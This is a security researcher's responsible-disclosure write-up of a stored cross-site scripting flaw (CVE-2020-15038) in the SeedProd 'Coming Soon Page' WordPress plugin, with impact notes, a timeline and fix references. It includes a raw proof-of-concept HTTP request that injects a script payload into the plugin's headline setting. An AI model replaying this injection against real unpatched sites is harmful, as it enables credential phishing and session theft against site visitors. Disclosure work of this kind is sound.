Coming Soon Page, Under Construction & Maintenance Mode by SeedProd plugin for WordPress version 5.1.0 and below were found to be vulnerable to stored XSS while I was auditing the plugin.
Plugin version 5.1.2 with improved data sanitization was released on June 24, 2020.
Summary
Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress Plugin with over 1 million active installations. It was found to be vulnerable to stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.
Impact
While there are multiple ways in which an attacker can perform malicious actions exploiting this vulnerability, let’s take a look at two.
If an attacker were to exploit the vulnerability, they would be able to use an XSS payload to cause redirection such that any time the developer enables maintenance mode, a user visiting the site would be redirected to a domain under the attacker’s control, which could be made to look exactly like the original website with a login form for the user to submit their credentials. If the user submits their credentials without noticing the changed domain, their account gets compromised.
Similarly, an attacker can also use a payload to create a login form on the Coming Soon/Maintenance Mode page itself, trying to bait unsuspecting users into entering their credentials.
Vulnerability
The Headline field under the Page Settings section along with other fields in the plugin settings were found to be vulnerable to stored XSS, which gets triggered when the Coming Soon page is displayed (both in preview mode and live).
POST /wp-admin/options.php HTTP/1.1
Host: localhost:10004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
Content-Type: application/x-www-form-urlencoded
Content-Length: 636
Origin: http://localhost:10004
Connection: close
Cookie: ...
option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=
Timeline
- Vulnerability reported to the SeedProd team – June 22, 2020.
- Version 5.1.2 containing the fix to the vulnerability released – June 24, 2020.
Recommendation
It is highly recommended to update the plugin to the latest version.
Reference
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15038
- https://nvd.nist.gov/vuln/detail/CVE-2020-15038
- https://wordpress.org/plugins/coming-soon/#developers
- https://wpvulndb.com/vulnerabilities/10283
Special Note
I highly appreciate the efforts by the SeedProd team in responsibly fixing the issue and releasing the update quickly!
